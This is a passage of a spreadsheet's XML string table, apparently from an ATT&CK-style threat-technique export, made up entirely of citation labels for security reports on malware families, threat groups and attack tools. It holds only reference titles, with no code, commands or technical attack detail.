    <t>(Citation: FireEye APT28),(Citation: Talos ZxShell Oct 2014),(Citation: ESET InvisiMole June 2018),(Citation: Palo Alto Reaver Nov 2017),(Citation: Nccgroup Emissary Panda May 2018),(Citation: ESET OceanLotus Mar 2019),(Citation: Trend Micro njRAT 2018),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: Crowdstrike Indrik November 2018),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: Microsoft FinFisher March 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky Turla),(Citation: TrendMicro Ursnif Mar 2015),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Trustwave Pillowmint June 2020),(Citation: McAfee GhostSecret),(Citation: Trend Micro Waterbear December 2019),(Citation: Talos Bisonal Mar 2020),(Citation: CyberBit Dtrack),(Citation: Kaspersky WIRTE November 2021),(Citation: Cisco DNSMessenger March 2017),(Citation: Cybereason Bazar July 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Accenture Lyceum Targets November 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: Unit 42 Valak July 2020),(Citation: Lastline PlugX Analysis),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: FoxIT Wocao December 2019),(Citation: Unit42 BabyShark Feb 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Check Point APT35 CharmPower January 2022),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: FinFisher Citation),(Citation: Microsoft Reg),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Zebrocy May 2019),(Citation: FireEye APT32 May 2017),(Citation: Kaspersky StoneDrill 2017),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Talos Group123),(Citation: Securelist APT10 March 2021),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Novetta Blockbuster Loaders),(Citation: NCC Group WastedLocker June 2020),(Citation: ESET Industroyer),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ESET Carbon Mar 2017),(Citation: McAfee Sharpshooter December 2018),(Citation: Symantec Buckeye),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: GDATA Zeus Panda June 2017),(Citation: Gh0stRAT ATT March 2019),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: Novetta Blockbuster),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: CIRCL PlugX March 2013),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 QUADAGENT July 2018),(Citation: FireEye CARBANAK June 2017),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit42 BendyBear Feb 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Prevx Carberp March 2011),(Citation: Microsoft PLATINUM April 2016),(Citation: GitHub PowerSploit May 2012),(Citation: Palo Alto Shamoon Nov 2016),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Symantec Hydraq Jan 2010),(Citation: Talos TinyTurla September 2021),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Lazarus APT January 2022),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: PowerSploit Documentation),(Citation: Qualys LolZarus),(Citation: McAfee Cuba April 2021),(Citation: GitHub PowerSploit May 2012),(Citation: wardle evilquest partii),(Citation: ESET Gelsemium June 2021),(Citation: CrowdStrike IceApple May 2022),(Citation: MSTIC FoggyWeb September 2021),(Citation: Talos Lokibot Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Cyble Egregor Oct 2020),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Group-IB Anunak),(Citation: Cisco Talos Intelligence Group),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: McAfee Night Dragon),(Citation: Anomali Static Kitten February 2021),(Citation: Group IB Cobalt Aug 2017),(Citation: US-CERT Ukraine Feb 2016),(Citation: Unit 42 Hildegard Malware),(Citation: Symantec Thrip June 2018),(Citation: Bitdefender Trickbot March 2020),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: ESET RTM Feb 2017),(Citation: Securelist DarkVishnya Dec 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB RTM August 2019),(Citation: Securelist Kimsuky Sept 2013),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Dell Dridex Oct 2015),(Citation: ESET Trickbot Oct 2020),</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: LogRhythm WannaCry),(Citation: Windows RDP Sessions)</t>
  </si>
  <si>
    <t>,(Citation: Symantec SSH and ssh-agent)</t>
  </si>
  <si>
    <t>(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ESET DazzleSpy Jan 2022),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),(Citation: Cobalt Strike DCOM Jan 2017),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Microsoft Process Wide Com Keys),(Citation: Microsoft COM ACL),(Citation: Microsoft System Wide Com Keys),(Citation: Microsoft Disable DCOM),(Citation: Microsoft Protected View)</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Talos ZxShell Oct 2014),(Citation: Proofpoint TA505 October 2019),(Citation: FireEye PLA),(Citation: Cycraft Chimera April 2020),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Cylance Shaheen Nov 2018),(Citation: Novetta Blockbuster RATs),(Citation: BitDefender Chafer May 2020),(Citation: cobaltstrike manual),(Citation: GitHub Pupy),(Citation: Novetta Blockbuster),(Citation: Volexity Patchwork June 2018),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: PWC Cloud Hopper April 2017),(Citation: McAfee Night Dragon),(Citation: Novetta-Axiom),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye APT40 March 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: aptsim),(Citation: CERT-FR PYSA April 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cybereason Bumblebee August 2022),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Malwarebytes DarkComet March 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 April 2016),(Citation: Github Koadic),(Citation: Kaspersky Adwind Feb 2016),(Citation: Check Point Warzone Feb 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: SecureWorks August 2019),(Citation: Twitter Cglyer Status Update APT3 eml),(Citation: FireEye APT39 Jan 2019),(Citation: FireEye FIN10 June 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Cymmetria Patchwork),(Citation: FireEye CARBANAK June 2017),(Citation: Fidelis njRAT June 2013),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: US-CERT TA18-074A),(Citation: FireEye TRITON 2019),(Citation: CrowdStrike Grim Spider May 2019),(Citation: CrowdStrike StellarParticle January 2022),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: GitHub QuasarRAT),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Group IB Silence Sept 2018),(Citation: Proofpoint TA505 Jan 2019),(Citation: Windows RDP Sessions),(Citation: Berkley Secure)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020),(Citation: US-CERT NotPetya 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Novetta Blockbuster RATs),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Dragos Crashoverride 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: Dell TG-1314),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Novetta Blockbuster),(Citation: ESET Hermetic Wizard March 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: Kaspersky Regin),(Citation: DFIR Ryuk's Return October 2020),(Citation: Cybereason Conti Jan 2021),(Citation: FireEye Shamoon Nov 2016),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Symantec W32.Duqu),(Citation: McAfee Night Dragon),(Citation: Medium Anchor DNS July 2020),(Citation: Fortinet Diavol July 2021),(Citation: Novetta-Axiom),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Symantec Chafer February 2018),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: NCC Group APT15 Alive and Strong),(Citation: SANS Conficker),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Malwarebytes Emotet Dec 2017),(Citation: Kaspersky Turla),(Citation: Savill 1999),(Citation: RedCanary Mockingbird May 2020),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Cleaver),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CarbonBlack Conti July 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Symantec Buckeye),(Citation: Alperovitch 2014),(Citation: Bleeping Computer - Ryuk WoL),(Citation: Talos Nyetya June 2017),(Citation: PsExec Russinovich),(Citation: NCC Group Chimera January 2021),(Citation: Microsoft Preventing SMB)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Intezer TeamTNT September 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Anomali Rocke March 2019),(Citation: FireEye TRITON 2019),(Citation: PWC Cloud Hopper April 2017),(Citation: Symantec Palmerworm Sep 2020),(Citation: FireEye APT40 March 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Github PowerShell Empire),(Citation: Aqua Kinsing April 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Securelist GCMAN),(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Talos ZxShell Oct 2014),(Citation: Unit 42 Gamaredon February 2022),(Citation: Prevx Carberp March 2011),(Citation: Trickbot VNC module July 2021),(Citation: Check Point Warzone Feb 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: Symantec Shuckworm January 2022),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: objsee mac malware 2017),(Citation: Securelist GCMAN),</t>
  </si>
  <si>
    <t>(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: cobaltstrike manual),(Citation: Symantec RAINDROP January 2021),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: NCC Group Chimera January 2021),(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Dragos Crashoverride 2018),(Citation: Talos Olympic Destroyer 2018),(Citation: SecTools nbtscan June 2003),(Citation: Talos PoetRAT April 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Crowdstrike Indrik November 2018),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Turla),(Citation: Savill 1999),(Citation: Fidelis njRAT June 2013),(Citation: FireEye Periscope March 2018),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Symantec WastedLocker June 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: DFIR Ryuk's Return October 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: Symantec Leafminer July 2018),(Citation: Fortinet Diavol July 2021),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: TechNet Arp),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bumblebee August 2022),(Citation: Cybereason Bazar July 2020),(Citation: CrowdStrike BloodHound April 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: CME Github September 2018),(Citation: SecureWorks WannaCry Analysis),(Citation: FireEye APT39 Jan 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: FoxIT Wocao December 2019),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: cobaltstrike manual),(Citation: FireEye APT10 April 2017),(Citation: NTT Security Flagpro new December 2021),(Citation: Gigamon Berserk Bear October 2021),(Citation: FireEye Shamoon Nov 2016),(Citation: Roadtools),(Citation: ESET Telebots Dec 2016),(Citation: Aqua Kinsing April 2020),(Citation: Symantec Chafer February 2018),(Citation: ClearSky Lazarus Aug 2020),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Kaspersky APT Trends Q1 2020),(Citation: Bitdefender FIN8 July 2021),(Citation: GovCERT Carbon May 2016),(Citation: ESET Industroyer),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Debian nbtscan Nov 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Symantec Buckeye),(Citation: Crowdstrike Qakbot October 2020),(Citation: Bitdefender Naikon April 2021),(Citation: BitDefender Chafer May 2020),(Citation: Palo Alto ARP),(Citation: ESET ComRAT May 2020),(Citation: AlienVault Sykipot 2011),(Citation: Talos Cobalt Strike September 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: TechNet Ping),(Citation: ASERT Donot March 2018),(Citation: Cyberreason Anchor December 2019),(Citation: FireEye Clandestine Fox),(Citation: Alperovitch 2014),(Citation: Group IB Silence Sept 2018),(Citation: Nltest Manual),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Avira Mustang Panda January 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: Eset Ramsay May 2020),(Citation: Trend Micro Conficker),(Citation: ThreatExpert Agent.btz),(Citation: Trend Micro njRAT 2018),(Citation: DustySky),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Kaspersky Flame),(Citation: Trend Micro Qakbot May 2020),(Citation: Cisco H1N1 Part 2),(Citation: FireEye APT30),(Citation: FBI Flash FIN7 USB),(Citation: ESET Sednit USBStealer 2014),(Citation: Kaspersky Darkhotel),(Citation: SANS Conficker),(Citation: Fidelis njRAT June 2013),(Citation: TrendMicro Ursnif Mar 2015),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Forcepoint Monsoon),(Citation: Microsoft SIR Vol 19),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: win10_asr),(Citation: TechNet Removable Media Control),(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Skidmap),(Citation: ESET ForSSHe December 2018),(Citation: Sysdig Kinsing November 2020),(Citation: Lacework TeamTNT May 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: ESET LoudMiner June 2019),(Citation: Aqua Kinsing April 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: RedCanary Mockingbird May 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Imminent Unit42 Dec2019),(Citation: Talos Rocke August 2018),(Citation: Cisco Talos Intelligence Group),(Citation: Unit 42 Rocke January 2019),</t>
  </si>
  <si>
    <t>(Citation: Adsecurity Mimikatz Guide),(Citation: Deply Mimikatz),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Eset Ramsay May 2020),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: NSA/FBI Drovorub August 2020),(Citation: Cisco Talos Intelligence Group),(Citation: FireEye APT41 Aug 2019),(Citation: Unit 42 Hildegard Malware),(Citation: FireEye Hikit Rootkit),(Citation: Check Point Warzone Feb 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: NCSC Joint Report Public Tools),(Citation: Kaspersky Turla),(Citation: Sophos ZeroAccess),(Citation: Umbreon Trend Micro),(Citation: Symantec Darkmoon Aug 2005),(Citation: Intezer HiddenWasp Map 2019),(Citation: ESET Sednit Part 3),(Citation: Anomali Rocke March 2019),(Citation: Prevx Carberp March 2011),(Citation: TrendMicro Hacking Team UEFI),(Citation: Chronicle Winnti for Linux May 2019),(Citation: ESET Ebury Oct 2017),(Citation: ESET LoJax Sept 2018),(Citation: Symantec APT28 Oct 2018),(Citation: Trend Micro Skidmap),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Cybereason StrifeWater Feb 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: Talos Lokibot Jan 2021),(Citation: Powersploit),(Citation: TechNet Server Operator Scheduled Task),(Citation: TechNet Scheduling Priority)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: TechNet At),(Citation: Linux at),(Citation: CME Github September 2018),(Citation: Dell Lateral Movement),(Citation: Dell TG-3390),(Citation: TechNet Server Operator Scheduled Task),(Citation: TechNet Scheduling Priority),(Citation: Secureworks - AT.exe Scheduled Task),(Citation: Powersploit),(Citation: Kifarunix - Task Scheduling in Linux)</t>
  </si>
  <si>
    <t>,(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Anomali Rocke March 2019),(Citation: Unit42 Xbash Sept 2018),(Citation: ANSSI Sandworm January 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Janicab),(Citation: Medium Anchor DNS July 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Aqua Kinsing April 2020),(Citation: ESET TeleBots Oct 2018),(Citation: Talos Rocke August 2018),(Citation: Trend Micro Skidmap),(Citation: Unit 42 Rocke January 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Check Point APT34 April 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: KISA Operation Muzabi),(Citation: Cybereason Valak May 2020),(Citation: Volexity Patchwork June 2018),(Citation: Cybereason Molerats Dec 2020),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Trend Micro Qakbot May 2020),(Citation: Talos GravityRAT),(Citation: ClearSky OilRig Jan 2017),(Citation: ESET Crutch December 2020),(Citation: Volexity SolarWinds),(Citation: Secureworks MCMD July 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: ESET RTM Feb 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: PowerSploit Documentation),(Citation: Trend Micro Qakbot December 2020),(Citation: ANSSI RYUK RANSOMWARE),(Citation: US-CERT TA18-074A),(Citation: Microsoft Totbrick Oct 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Kaspersky QakBot September 2021),(Citation: ClearSky Pay2Kitten December 2020),(Citation: CopyKittens Nov 2015),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Symantec Ukraine Wipers February 2022),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cycraft Chimera April 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: FireEye NETWIRE March 2019),(Citation: Mandiant No Easy Breach),(Citation: Eset Ramsay May 2020),(Citation: 360 Machete Sep 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: CISA SoreFang July 2016),(Citation: Unit 42 OilRig Sept 2018),(Citation: F-Secure Cosmicduke),(Citation: Reaqta MuddyWater November 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: CISA AppleJeus Feb 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: TechNet Schtasks),(Citation: McAfee Night Dragon),(Citation: Malwarebytes Dyreza November 2015),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Accenture Lyceum Targets November 2021),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: Unit 42 Valak July 2020),(Citation: McAfee Dianxun March 2021),(Citation: Symantec Elfin Mar 2019),(Citation: Symantec Shuckworm January 2022),(Citation: FireEye APT39 Jan 2019),(Citation: Secure List Bad Rabbit),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Rancor Unit42 June 2018),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: Symantec Bumblebee June 2022),(Citation: Unit42 Molerat Mar 2020),(Citation: SentinelOne Valak June 2020),(Citation: FireEye FIN7 Aug 2018),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: FireEye APT34 July 2019),(Citation: ESET Sednit Part 1),(Citation: Talos Frankenstein June 2019),(Citation: FireEye FIN7 April 2017),(Citation: Talos Lokibot Jan 2021),(Citation: FireEye Operation Double Tap),(Citation: F-Secure CozyDuke),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Qualys LolZarus),(Citation: CISA Zebrocy Oct 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: Malwarebytes Higaisa 2020),(Citation: FireEye APT32 May 2017),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: FireEye Shamoon Nov 2016),(Citation: Check Point Meteor Aug 2021),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: NCC Group Team9 June 2020),(Citation: OilRig New Delivery Oct 2017),(Citation: Group IB Cobalt Aug 2017),(Citation: Unit42 Redaman January 2019),(Citation: ESET Sednit July 2015),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Gazer Aug 2017),(Citation: ESET Machete July 2019),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Tarrask scheduled task),(Citation: Mandiant UNC3890 Aug 2022),(Citation: FireEye FIN10 June 2017),(Citation: CERT-EE Gamaredon January 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Zscaler Higaisa 2020),(Citation: ESET Carbon Mar 2017),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye TRITON 2019),(Citation: Symantec Buckeye),(Citation: Crowdstrike Qakbot October 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: Talos Nyetya June 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Red Canary Qbot),(Citation: Bitdefender Naikon April 2021),(Citation: Flashpoint FIN 7 March 2019),(Citation: Morphisec FIN7 June 2017),(Citation: Cyberint Qakbot May 2021),(Citation: BitDefender Chafer May 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: S2 Grupo TrickBot June 2017),(Citation: Kroll Qakbot June 2020),(Citation: ESET Lazarus Jun 2020),(Citation: ESET ComRAT May 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Juniper IcedID June 2020),(Citation: Symantec W32.Duqu),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Palo Alto OilRig Sep 2018),(Citation: US-CERT Emotet Jul 2018),(Citation: Microsoft Actinium February 2022),(Citation: Trend Micro Totbrick Oct 2016),(Citation: Securelist Machete Aug 2014),(Citation: Sophos Maze VM September 2020),(Citation: SecureWorks August 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: ASERT Donot March 2018),(Citation: Group IB GrimAgent July 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Securelist Remexi Jan 2019),(Citation: Group IB Ransomware September 2020),(Citation: GitHub PowerSploit May 2012),(Citation: Palo Alto Shamoon Nov 2016),(Citation: SecureList Griffon May 2019),(Citation: ESET InvisiMole June 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: NCC Group Chimera January 2021),(Citation: Powersploit),(Citation: TechNet Server Operator Scheduled Task),(Citation: TechNet Scheduling Priority)</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),(Citation: Symantec Linfo May 2012),(Citation: ESET Machete July 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Kaspersky Adwind Feb 2016),(Citation: ClearSky Siamesekitten August 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET Sednit Part 2),(Citation: FireEye MuddyWater Mar 2018),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET ComRAT May 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: cobaltstrike manual),(Citation: PTSecurity Higaisa 2020),(Citation: Talos TinyTurla September 2021),(Citation: ESET Gelsemium June 2021),(Citation: Securelist ShadowPad Aug 2017),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
